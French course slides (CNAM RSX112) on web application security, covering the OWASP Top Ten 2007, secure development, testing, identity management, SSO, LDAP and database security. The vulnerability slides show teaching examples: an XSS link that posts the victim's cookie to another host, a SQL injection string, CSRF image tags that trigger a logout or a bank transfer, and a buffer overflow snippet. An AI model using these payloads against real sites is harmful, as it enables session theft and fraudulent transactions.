RSX112 Sécurité et réseaux Module 14 Sécurité des applications Web, annuaires, bases de données 1 CNAM 2007-14/EBU
Sécurité des applications Web Projet OWASP (www.owasp.org) Publication de documents FAQ sur la sécurité des applications Guide de sécurisation Guide de revue de code Guide de test/audit de sécurité d applications Développement d outils Webscarab : Outil de tests de sécurité Web Webgoat : formation à la sécurité LAPSE : analyse de code Java Sprajax : tests d application AJAX 2 CNAM 2007-14/EBU
Les dix failles majeures des applications Web Basé sur les analyses/observations de MITRE Gère la base CVE Référence toutes les failles Analyse 2006 3 CNAM 2007-14/EBU
Version 2007 Evolutions 4 CNAM 2007-14/EBU
Contenu Décrit des vulnérabilités, pas des attaques Attaques associées Attaques de Phishing : utilisent potentiellement toutes les vulnérabilités mais souvent XSS, et des faiblesses dans les vérifications d authentification ou d autorisation (A1, A4, A7, A10) Attaques sur les données personnelles : manque de validation et de contrôle des autorisations (A2, A4, A6, A7, A10) Vol d identité : Faiblesse ou absence de contrôles crypto (A8 and A9), inclusion de fichiers (A3) et faiblesse des contrôles d authentification et d autorisation (A4, A7, A10) Compromission de systèmes, modification ou desctruction de données : Injections (A2) et inclusion de fichiers à distance (A3) Pertes financières : Manque de contrôle des autorisation de transaction, et attaques CSRF (A4, A5, A7, A10) Perte de réputation : exploitation de n importe quelle vulnérabilité (A1 - A10) 5 CNAM 2007-14/EBU
A1 Cross Site Scripting (XSS) Arrive à chaque fois qu une application utiliser des données envoyées par un utilisateur et l envoie vers un Navigateur Web sans valider ou encoder le contenu. Permet à un attaquant d exécuter des scripts sur le navigateur de l utilisateur et de mener des actions illicites (récupération de cookies, utilisation des droits de l utilisateur, installation de logiciels malicieux, ) 6 CNAM 2007-14/EBU
Exemple 1 Response.Write("Welcome" & Request.QueryString("UserName")) 7 CNAM 2007-14/EBU
Exemple 2 <a href=http://www.contoso.msft/welcome.asp?name= <FORM action=http://www. nwtraders.msft/data.asp method=post id= idform > <INPUT name= cookie type= hidden > </FORM> <SCRIPT> idform.cookie.value=document.cookie; idform.submit(); </SCRIPT> > here </a> 8 CNAM 2007-14/EBU
A2 Faille d injection Courant dans les applications Web (notamment injection SQL) Se produit quand des données envoyées par un utilisateur sont envoyées directement à un interpréteur externe, comme partie d une requête ou d une commande L attaquant envoie des données visant à faire exécuter à l interpréteur des commandes malicieuses ou à modifier des données 9 CNAM 2007-14/EBU
Exemple injection Modèle de développement SELECT COUNT (*) FROM Users WHERE UserName= +param1+ AND Password= +param2+ Une requête normale SELECT COUNT (*) FROM Users WHERE UserName= Jeff AND Password= imbatman Une requête frauduleuse SELECT COUNT (*) FROM Users WHERE UserName= or 1=1-- AND Password= "or 1=1" toujours vrai "--" Commentaire 10 CNAM 2007-14/EBU
Les dix failles majeures des applications Web (2/4) A3 Exécution de fichiers malicieux Autorise un attaquant à inclure des fichiers à distances Permet d introduire du code ou des données hostiles Résultat critique : serveur compromis Affecte PHP, XML et tous les frameworks qui acceptent des noms de fichiers ou des fichiers provenant des utilisateurs A4 Référence directe non sécurisée à un objet Utilisation par un développeur d une référence directe à un objet interne (fichier, enregistrement de BdD, clé, URL, ) dans une URL ou un paramètre de FORM Un attaquant peut manipuler ces références pour accéder à ces objets ou à d autres sans autorisation A5 Requête Cross Site involontaire (Cross Site Request Forgery CSRF) Oblige le navigateur d une victime connectée à envoyer une requête à une application Web vulnérable Force une action non voulue par l utilisateur Potentiellement aussi puissant que l application qu elle utilise 11 CNAM 2007-14/EBU
Exemples de CSRF Exemple 1 Attaque typique CSRF contre un forum Re-diriger l utilisateur vers une fonction, par exemple le logout d une application Le fait de visualiser une page contenant le tag suivant génère une requête de logout <img src="http://www.example.com/logout.php"> Exemple 2 Banque en ligne qui autorise des traitements (ex. Transfert de fonds) Attaque peut inclure le tag : <img src="http://www.example.com/transfer.do?frmacct=document.form.frmacct& toacct=4345754&toswiftid=434343&amt=3434.43"> Attaque montrée à BlackHat 2006 Possibilité de forcer un utilisateur à modifier la configuration de son routeur ADSL Utilisation de l inteface Web Utilisation du nom de compte par défaut Raisons de l attaque Intégration automatique des éléments d authentification par le navigateur (typiquement le cookie de session) Pas de nécessité pour l attaquant de fournir un login/pasword Lien fort avec XSS Possibilité de mettre le lien dans un XSS 12 CNAM 2007-14/EBU
Les dix failles majeures des applications Web (3/4) A6 Fuite d information et mauvaise gestion des erreurs Les applications peuvent involontairement fournir des informations sur leur configuration, leur fonctionnement interne Les données personnelles ne sont pas nécessairement protégées au bon niveau Les attaquants peuvent utiliser cette faiblesse pour voler des données sensibles ou réaliser des attaques plus complexes et plus critiques A7 Authentification insuffisante ou mauvaise gestion de session Les éléments d authentification et de compte sont souvent insuffisamment protégés Idem sur les tokens de session Les attaquants peuvent découvrir des mots de passe, des clés ou des tokens d authentification ou de session et utiliser l identité du porteur légitime 13 CNAM 2007-14/EBU
Les dix failles majeures des applications Web (4/4) A8 Stockage non sécurisé d éléments crypto Les applications utilisent rarement les fonctions crypto correctement pour protéger les données et les éléments d authentification Les attaquants peuvent utiliser ces faiblesses pour voler des identité ou commettre d autres délits comme la fraude au numéro de carte de crédit A9 Communications non sécurisées Les applications ne chiffrent pas systématiquement le trafic réseau lorsqu il est nécessaire de protéger des données ou communications sensibles A10 Mauvais contrôle d accès aux URL Fréquemment, les applications ne protègent les fonctions sensibles qu en masquant les URL correspondantes aux utilisateurs non autorisés Les attaquants peuvent utiliser cette faiblesse pour accéder directement aux URL et réaliser des actions non autorisées 14 CNAM 2007-14/EBU
Cycle de développement d applications Spécifications fonctionnelles Architecture technique Spécifications techniques Développement Tests unitaires Tests fonctionnels Tests d intégration Tests de Pré-production Où/quand faut-il s occuper de sécurité? 15 CNAM 2007-14/EBU
Spécifications fonctionnelles Inclure la conformité avec la politique de sécurité de la société Les spécifications fonctionnelles peuvent inclures des besoins de sécurité Protection des informations sensibles (C, I, D) Protection des fonctions sensibles (C, I, D) Authentification Contrôle d accès Journalisation Nécessite une analyse de risques pour identifier les besoins et objectifs de sécurité 16 CNAM 2007-14/EBU
Architecture technique Doit intégrer l infrastructure dans laquelle l application va être déployée Principe de séparation réseau (utilisateurs, administration, backup, DMZ, ) Type d accès utilisateur LAN Remote Internet Nécessité d identifier les flux entre les différents composants Protection des flux si nécessaire Mise en oeuvre IDS/IPS 17 CNAM 2007-14/EBU
Spécifications techniques Doivent intégrer des aspects sécurité Proposition de besoins minimaux Authentification Login/password obligatoire pour les fonctions sensibles SSL pour protéger le transfert de login/password Contrôle d accès Séparer les utilisateurs des administrateurs Gérer les sessions Journalisation Identifier les connexions/déconnexions Y compris les tentatives Tracer le login et l @ IP Assurer que l application ne diminue pas le niveau de sécurité global du SI Checklists pour la configuration des serveurs OS Serveur Web Serveur BdD Utiliser les bonnes pratiques de développement Cf. top ten des risques sur les applications Web 18 CNAM 2007-14/EBU
Développement Appliquer les meilleures pratiques Vérifier les entrées utilisateur par rapport au format attendu Protéger les données sensibles (chiffrement, signature) Vérifier que les données sensibles ne sont pas accessibles (logs, sauvegardes, ) Utiliser des jeux de tests différents de la production pour les données sensibles Analyse de code Utiliser des outils pour découvrir d éventuels trous de sécurité Solutions Mettre en œuvre SSL pour les connexions au serveur Web (http://www.openssl.org) Mettre en œuvre des firewalls applicatifs locaux (mod_security : http://www.modsecurity.org/) Mettre en œuvre des appliances sécurité dédiée Web (denyall) Mettre en œuvre du SSO Utiliser des frameworks Mettre en œuvre des annuaires (http://www.openldap.org) Utiliser des certificates (X509v3) 19 CNAM 2007-14/EBU
Règles de bon développement Se méfier des entrées utilisateur Se protéger contre les saturations/débordements de tampon Éviter les scripts inter-site N'exigez pas d'autorisations d'administrateur système (sa) Attention au code assurant des fonctions cryptographiques Réduire votre profil d'attaque Utiliser le principe du moindre privilège Faire attention aux modes de défaillance Gérer les identités et les sessions Écrire des applications que les non-administrateurs puissent réellement utiliser 20 CNAM 2007-14/EBU
Toute saisie est source de problème Point fondamental lors de la conception Identifier au plus tôt saisie,règles de saisie Saisie et Buffer overrun dans le code C/C++ Les formes canoniques (piège dans les url) Saisie et base de données (Sql injection) Saisie sur le Web et XSS (cross scripting site) Denis de service et robustesse des codes 21 CNAM 2007-14/EBU
Exemple de débordement de la pile Haut de la pile void UnSafe (const char* uncheckeddata) char[4] { } char localvariable[4]; int anotherlocalvariable; strcpy (localvariable, uncheckeddata); int Adresse de retour 22 CNAM 2007-14/EBU
Débordement de segments de mémoire Remplace les données stockées dans le segment Plus difficile à exploiter qu'un débordement de mémoire tampon strcpy Données Pointeur Données xxxxxxx Données xxxxxxx Pointeur Pointeur 23 CNAM 2007-14/EBU
Configuration Listes de vérification pour configurer correctement les différents composants logiciels Modifier les configuration par défaut, les mots de passe par défaut, Arrêter tous les services réseau non nécessaires Activer les ACL sur les machines Java pour limiter les API autorisées aux applications 24 CNAM 2007-14/EBU
Tests Tests d intrusion et de vulnérabilités peuvent être menés dès que les différents composants de l application sont intégrés Objectif : identifier les trous de sécurité et les corriger avant le déploiement de l application Différentes approches/niveaux 1. Les testeurs ne sont pas utilisateurs de l application testées (accès via le réseau) 2. Les testeurs sont utilisateurs de l application (accès via le réseau) 3. Les testeurs sont administrateurs de l application (accès via le réseau) 4. Les testeurs sont administrateurs système/bdd (accès complet au système) 25 CNAM 2007-14/EBU
Démarches de tests Tests d intrusion Cas 1 (distant, sans droits sur l application) Identifier les services réseau disponibles Identifier les composants logiciels et l architecture utilisée Essayer les vulnérabilités connues sur les logiciels utilisés (serveur Web, OS, BdD, ) Essayer de se connecter à travers les services réseau disponibles Cas 2 (distant, droits utilisateur) Essayer d augmenter ses droits (accès aux fonctions d administration de l application) Essayer d accéder au système Essayer d entrer des données erronées (simuler des attaques ou des erreurs) Cas 3 (distant droits administrateur) Cf. cas 2 Cas 4 (droits administrateur locaux) Vérifier si la configuration est correcte Estimer les conséquences si un attaquant obtient les droits admin 26 CNAM 2007-14/EBU
Comment tester? Manuellement Attaquant : être humain Utilise son savoir faire Peut adapter des outils, recompiler, Avec des outils Utilisation d un outil qui génère des attaques Scanner de vulnérabilités Web Beaucoup de false positive Beaucoup de false négatives Nécessiter d utiliser beaucoup d outils 27 CNAM 2007-14/EBU
Standardisation des tests Pas de standard pour tester une application Web Comment tester des vulnérabilités? Différents contenus peuvent être utilisés pour détecter une vulnérabilité <script>alert(document.cookie)</script ou <body onload=alert(document.cookie)>??? Faut-il tester avec 1000xA ou 100000000xA pour détecter un buffer overfow? Comment qualifier le résultat d un test? (voir l apparition d une pop-up?) S assurer que le test a un sens (script de script de script : peu de chance que ce soit réellement exécuté) Guide de test OWASP Générique Pas technique OSSTMM (Open Source Security Testing Methodology Manual) Très détaillé Plus adapté aux OS, réseau, qu aux applications Web 28 CNAM 2007-14/EBU
Outils Open-source Gratuits Tournent souvent sur de multiples plate-forme (souvent Java/perl/ ) Pas ou peu de reporting Nécessité d être une testeur-expert sécurité pour les utiliser Exemples Oedipus Paros Burp Intruder WebScarab Fuzzer Spike E-Or 29 CNAM 2007-14/EBU
Outils payants Chers License basée sur une application, un serveur ou une adresse IP Très bon reporting Tournent souvent sous Windows Utilisation type «suivant suivant» Nécessité d un expert en sécurité applicative et dans l outil pour des résultats optimaux Exemples Cenzic HailStorm SPIDynamics WebInspect Sanctum AppScan Acunetix NTOspider 30 CNAM 2007-14/EBU
Gestion des identités Fournir une identification des personnes sécurisée et de confiance Permettre l intégration de contrôles d accès logiques et physiques Configurable pour s adapter aux besoins de l activité, de la réglementation ou culturels S intégrer à l annuaire d entreprise et à d autres applications : Porte monnaie électronique, gestion de droits numériques Signature numérique Permettre une gestion centralisée et simplifiée : Des identités, des permissions et des fonctions Des éléments d authentification mots de passe, cartes à puces, tokens 31 CNAM 2007-14/EBU
Sécuriser l environnement de l Entreprise Sécurité stations Login Windows Sécurité réseaux Firewalls, VPN, Certificats, Protection Virus, Détection d intrusion, Wireless LAN Applications Serveurs Web, Bases de données, ERP, CRM, Authentification forte et SSO pour accéder à : Stations sécurisées Réseau local Réseau distant Applications d entreprise Gestion de l authentification Mot de passe PKI/SKI Carte à puce Biométrie Tokens Gestion et prévision des utilisateurs et des groupes (optionnel) Annuaire d entreprise 32 CNAM 2007-14/EBU
Besoins d identité électronique Menace Sécurité Interne Menace Sécurité Externe Conformité Règlements Réduction de coûts 80% des incidents de sécurité ont une origine interne la perte moyenne estimée est de $110,000 par société (InterGov, org. internationale de lutte contre la cyber criminalité) Les employés mécontents ont été le plus souvent à la source des incidents internes pour 75% des réponse à une enquête du FBI (FBI and the Computer Security Institute) Absence d authentification basée sur 2 facteurs pour les accès distants ou les VPN Accès non autorisés à des locaux (aéroport, bases militaires) Accès logiques non autorisés Mots de passe aisément devinables «Social engineering» Décrets, lois et réglementation visant à protéger les données privées à travers une authentification renforcée et la journalisation : Graham-Leach- Bliley Act (GLBA) Health Insurance Portability and Accountability Act (HIPAA) Federal Information Security Mgmt. Act (FISMA) The Patriot Act Loi informatique et liberté (CNIL) La prolifération de mots de passe augmente leurs coûts de gestion La gestion des mots de passe est une des postes de coût les plus importants dans la gestion help desk La perte de productivité des utilisateurs due aux problèmes d accès liés à la possession de plusieurs mots de passe 33 CNAM 2007-14/EBU
Problème : la prolifération des identités électroniques Prolifération des identités électroniques Des droits et matériels multiples gérés par des départements différents Demande croissante pour des accès 24/7 à l entreprise Sécurité Physique Accès distant Paie Accès Dépt Portail partenaires Accès Internet Applications internes 34 CNAM 2007-14/EBU
Problème : systèmes multiples > coûts élevés Dilemme : Répondre aux besoins de sécurité vs. Coût et complexité Password5 Coût total de la gestion d identié Token Password4 Password3 PKI & Password2 Building Access on Card Picture ID on Card Confiance (Sécurité, exploitabilité et facilité d utilisation) 35 Corporate Overview CNAM 2007-14/EBU
Solution : la nouvelle courbe des services d identité électronique PIN Biometric Infrastructure de gestion d identité ROI de la gestion d identité Facilité d utilisation Réduction des coût (TCO) Sécurité améliorée Password5 Coût total de la gestion d identité Password4 Password3 PKI & Password2 Building Access on Card Picture ID on Card Token Static Passwords Confiance (Sécurité, Exploitabilité et facilité d utilisation) 36 CNAM 2007-14/EBU
Utilisateur nomade Sécuriser l accès à l Entreprise Connexion machine Connexion Distante Connexion Réseau Local SAP PSOFT Exchange Accès Bâtiment Main Frame Applications Entreprise Web App Web App Web App Utilisateur local 37 CNAM 2007-14/EBU
Solutions d identité électronique Aperçu des solutions Solutions Digital ID Card Contrôle d accès par carte à puce Photo ID badge Physical Access Card Remote Access Card Secure Desktop Card Secure Sign-on Card Solutions Secure Desktop Secure Workstation Login sécurisé Verrouillage de session Services de chiffrement (Files, Disk, E-mail) Solutions Accès distants sécurisés Enterprise RAS Dialup VPN Web Access Wireless LAN Financial RAS B2B & B2C Banking Solutions Secure Sign-On Secure Sign-on Workstation Login Network Login Application sign-on Web app sign-on Automated Password Management Plateforme de gestion des identités électroniques Card Middleware et ID Applet Suite Management matériel Management authentification Card Middleware for Windows, Mac, Linux & Unix ID Applet Suite: PIN, PKI, One-Time Password, Secure Container, Biometric Match on Card Délivrance, Gestion, Préparation des packages Devices: Smart Cards, Tokens, USB Keys Délivrance, Gestion, Préparation des packages Passwords, One-Time Passwords, Digital Certificates, Key Management, Biometrics Administration Help Desk, Self Service, Auditing & Reporting 38 CNAM 2007-14/EBU
Décomposition fonctionnelle d IdM Objectifs et fonctions principales Enregistrement Gestion Identification Vérification Credentialing Gestion des droits Provisioning Workflow Fédération Fédération Fonctions IdM ID unique global Niveau d assurance de l identité Certificats X509, Tokens / Cards Password, Biometrie Gestion des rôles (Entitlements / Subscriptions) Gestion des accès (ACL / Rule Management) Gestion des comptes utilisateur (Login IDs) Gestion des profils Gestion et synchronisation de mots de passe Gestion des demandes Intégration d évènements Administration déléguée Auto-gestion Technologies sous-jacentes Global ID Service PKI / Kerberos Syst. à 2 facteurs Service RBAC Workflow Provisioning Meta-Annuaire Service Annuaire Application Application Conformité Authentification Autorisation Fédération Audit & Reporting Authentification utilisateurs & SSO Services d autorisation Contrôle des accès avec privilèges Journalisation et reporting Supervision sécurité Portail / Web SSO Service Plateforme Appliances AuthN Service AuthZ Service 39 CNAM 2007-14/EBU
Évolutions des services IdM Intégration & Synchronisation Meta-annuaire, Provisioning utilisateur, EAI, WS, integration spécifique Contrôle d Accès Provisioning, modélisation RBAC, Règles de gestion Workflow Schéma d approbation, ticketing, facturation, gestion automatisée de données Complétude Value to Vision IdM Services d annuaire Stockage d identités et de profils. Stockage de données d application Services d identifiants Identifiant unique et global, outils d activation Self-Services Enregistrement, administration déléguée, gestion de profil, Organisation Services Opérationnels Standard templates, deployments, operational processes and toolset ID & PW uniques Synchronisation de login/password sur les postes de travail et Web Services fédérateurs Web services intégration via SAML, DSML, SPML, ebxml, etc. Services d authentification Authentification centralisée, cartes / tokens ID, PKI, Web- SSO Planning de mise en oeuvre 40 CNAM 2007-14/EBU
Synthèse IdM Problèmes Conséquences Solutions Bénéfices Compte inutilisés, pas de suppression de comptes Risques de failles de sécurité, pas d imputabilité Outils de découverte et de suppression des compte inutilisés Conformité en cas d audit; amélioration de la sécurité Information utilisateur périmée; méthodes de mise à jour complexes Coûts administratifs et opérationnels ; diminution de l efficacité Règles de synchronisation des profils; interfaces de self services Information à jour ; mis à jour aisée par l utilisateur final Stratégies de password hétérogènes Coûts helpdesk élevés; faible expériences des utilisateurs Infrastructure globale de synchronisation et reset de password Réduction des coûts de helpdesk et expérience des utilisateurs Multiples processus redondants pour l ajout et le retrait de nouveaux collaborateurs Duplication de login pour un même utilisateur due à la complexité Elargir le périmètre des META systèmes au solutions de provisioning Enregistrement d un nouvel utilisateur automatisé; réduction des dépenses associées Stockages de données spécifiques; pas de partage de données Pas de mutualisation de login dans les systèmes Partage temps réel de données globales; consolidation des domaines d authentification Amélioration de l expérience de SSO; possibilité d admin. centralisée Utilisation d informations personnelles comme identifiant unique dans les systèmes Problème potentiel sur le traitement de données personnelles Intégration des contraintes réglementaires pour les identifiants uniques Non-repudiation par un individu de son login 41 CNAM 2007-14/EBU
SSO Objectifs Idéalement Un seul mot de passe Saisi une seule fois Dans les faits Beaucoup d applications/systèmes ont leur propre mécanisme de login Réduire le nombre de login/password Réduire le risque lié aux mots de passe Un seul à retenir Plus complexe Changé plus souvent Attention à ne pas augmenter le risque! Réduction des coûts Amélioration du confort Terminologie SSO : Single Sign On (une seule authentification pour toutes les applications/systèmes) CSO : Common Sign On (authentification identique pour toutes les applications/systèmes) 42 CNAM 2007-14/EBU
Analyse des coûts Economies Coût d un reset de password Moins de resets à faire Self service Coûts de X connexions Dépenses Coût d intégration Coût d acquisition Coût de gestion 43 CNAM 2007-14/EBU
Risques Single Point of Failure (SPOF) Augmentation du risque d indisponibilité Point d attaque privilégié pour du DoS Vole d éléments d authentification par des implémentations nonsécurisée Projet trop ambitieux Combiner physique, réseau, systèmes, applications Procédures complexes Complexité d intégration Difficulté d intégrer l historique OS/390, AS/400, applications Client/Server, RADIUS Nécessité d intégrer les réglementations CNIL/Directive Européenne LSF SOX Santé / HIPAA... 44 CNAM 2007-14/EBU
Catégories de SSO SSO traditionnel Synchronisation de mot de passe Serveurs d authentification Solutions de login Web 45 CNAM 2007-14/EBU
SSO traditionnel (1/3) Permet à un utilisateur de s authentifier une seule fois Accès possible à des applications/systèmes/ multiples Peut gérer aussi du contrôle d accès et de l autorisation Quelles sont les applications autorisées Dans ces applications, quelles sont les fonctions autorisées Concept ancien Kerberos Radius 46 CNAM 2007-14/EBU
SSO traditionnel (2/3) Fonctionnement Authentification initiale Stockage des éléments nécessaires localement Présentation de ces éléments de façon transparente aux applications/systèmes Elément unique vs éléments multiples API et DLL Nécessité d implémenter le système pour toutes les applications concernées Scripts Jouent les authentifications de façon transparente Cookie Uniquement Web 47 CNAM 2007-14/EBU
SSO traditionnel (3/3) Avantages Simple d utilisation Réduit les coûts de support Réduit les cycles de connexion Inconvénients Intégration des applications historiques coûteuse et longue SPOF Solutions de script conduisent souvent à stocker localement les login/password sur le poste client 48 CNAM 2007-14/EBU
CSO Synchronisation de mots de passe (1/2) Centralisation de la gestion des mots de passe Possibilité d appliquer une politique globale Propagation sur les différents systèmes autorisés pour un utilisateur donné Scripts bi-directionnels ou gestion centralisée Fonctionnement Agents locaux qui modifient les mots de passe Ou redirection de l authentification vers un serveur central 49 CNAM 2007-14/EBU
Synchronisation de mots de passe (2/2) Avantages Un seul mot de passe à retenir Relativement simple à implémenter Reste possible par le HelpDesk sur l ensemble des systèmes depuis une seule console Possibilité d imposer une politique de mot de passe Vision centrale des autorisations Inconvénients Ne diminue pas le nombre de connexions/authentifications Ne gère que les authentifications par mot de passe 50 CNAM 2007-14/EBU
Serveurs d authentification Passerelles frontales Gère l authentification de l utilisateur Plusieurs niveaux possibles Plusieurs types d authentification possibles (CàP, Biométrie, certificats, ) Relai ou réalisation de l authentification vers les serveurs/applications Type proxy Nécessité d une couche d authentification SPOF 51 CNAM 2007-14/EBU
Solutions Web Login unique pour accéder à de multiples sites Deux architectures Frontal Type portail/passerelle Fonctionnement reverse-proxy Modification légère sur les applications Agent / Back office Connexion sur les serveurs Web Interrogation par les serveurs Web d un serveur central Stockage des éléments d autorisation Cookie Etat sur le serveur 52 CNAM 2007-14/EBU
Référentiel d utilisateurs : LDAP Lightweight Directory Access Procol Déclinaison simplifiée de la norme X500 5 modèles: Modèle d information Modèle de nommage Modèle fonctionnel Modèle de sécurité Modèle de réplication 53 CNAM 2007-14/EBU
Modèle d information Entrée = Objet Une entrée contient un ensemble d attributs (utilisateurs ou opérationnels) Classe d objet: définit les attributs que doit contenir un objet Classe abstraite, structurelle ou auxiliaire Possibilité d héritage Le schéma de l annuaire contient les classes d objets Le schéma de l annuaire permet de vérifier le respect de la syntaxe des données 54 CNAM 2007-14/EBU
Modèle de nommage Contraintes de nommage pour garantir l interopérabilité entre annuaires DIT (directory information tree) : définit l organisation et la désignation des données Deux types d objets Nœuds Feuilles Une racine (entrée vide) Chaque entrée est identifiée de manière unique Relative Distinguished Name Distinguished Name 55 CNAM 2007-14/EBU
Exemple de nommage 56 CNAM 2007-14/EBU
Syntaxe structurée Définition d un schéma Chaque classe a sa propre syntaxe Définit les attributs possibles/obligatoires/ Chaque attribut a sa syntaxe Type d information Liste des valeurs possibles Possibilité de comparaison 57 CNAM 2007-14/EBU
Modèle fonctionnel Le modèle fonctionnel décrit la manière d accéder aux données Fonctions d interrogation: search, compare Paramètres: base object, scope, derefaliases, size limit, time limit, attronly, search filter Fonctions de mise à jour: add, modify, delete, rename Fonctions de session: bind, unbind 58 CNAM 2007-14/EBU
Modèle de sécurité Définir pour chaque utilisateur des droits d accès aux données (authentification, liste de contrôle d accès) Garantir la confidentialité des échanges (chiffrement) 59 CNAM 2007-14/EBU
Modèle de réplication Dupliquer un annuaire sur plusieurs serveurs Prévenir les coupures réseau, les surcharges de service ou les pannes de serveur Structure maître-esclave Synchronisation totale/incrémentale Réplication en temps réel/à heure fixe 60 CNAM 2007-14/EBU
Communication client-serveur TCP/IP : port 389 / 636 (SSL) Mécanisme de questions-réponses sous forme de messages Traitement synchrone ou asynchrone Cas asynchrone: attribution d un numéro de contexte 61 CNAM 2007-14/EBU
OpenLDAP : Création de l arbre des données 62 CNAM 2007-14/EBU
OpenLDAP : ajout de données 63 CNAM 2007-14/EBU
Sécurité LDAP Protection des échanges réseau SSL Authentification SASL Plusieurs mécanismes possibles Syntaxe imposée Contrôle d accès ACL 64 CNAM 2007-14/EBU
Exemple OpenLDAP <access> clause : [[real]self]{<level> <priv>} <level> ::= none disclose auth compare search read write <priv> ::= {= + -}{w r s c x d 0}+ 65 CNAM 2007-14/EBU
ACL de base access to attr=userpassword by self =xw by anonymous auth access to * by self write by users read 66 CNAM 2007-14/EBU
Sécurité des bases de données Budgets Sécurité vont d'abord à l'achat de système de sécurité (firewalls, IDS,...) à la formation à la sécurisation des applications le SGBD est le parent pauvre de la sécurité Complexité Les BD sont une affaire de spécialistes: au niveau de leur gestion : DBA au niveau de la programmation On ne peut pas sérieusement faire de l'oracle deux fois par an Quand c'est le cas, la sécurité est encore pire! 67 CNAM 2007-14/EBU
Contraintes sur la sécurité Rôle du DBA maintenir le SGBD gérer les comptes, les applications,... pas de formation sécurité : ne peut pas «imaginer» les attaques possibles Mises à jour des systèmes d'expérience, 80% des serveurs de BD meurent avec le système et le SGBD initial: (Informix 7.2, Oracle 7.2,...) «If it works, don't fix it» Conséquence : de nombreuses failles système et applicatives ne sont JAMAIS corrigées, surtout sur les réseaux internes Criticité des applications : Arrêts impossibles La sécurité passe en dernier 68 CNAM 2007-14/EBU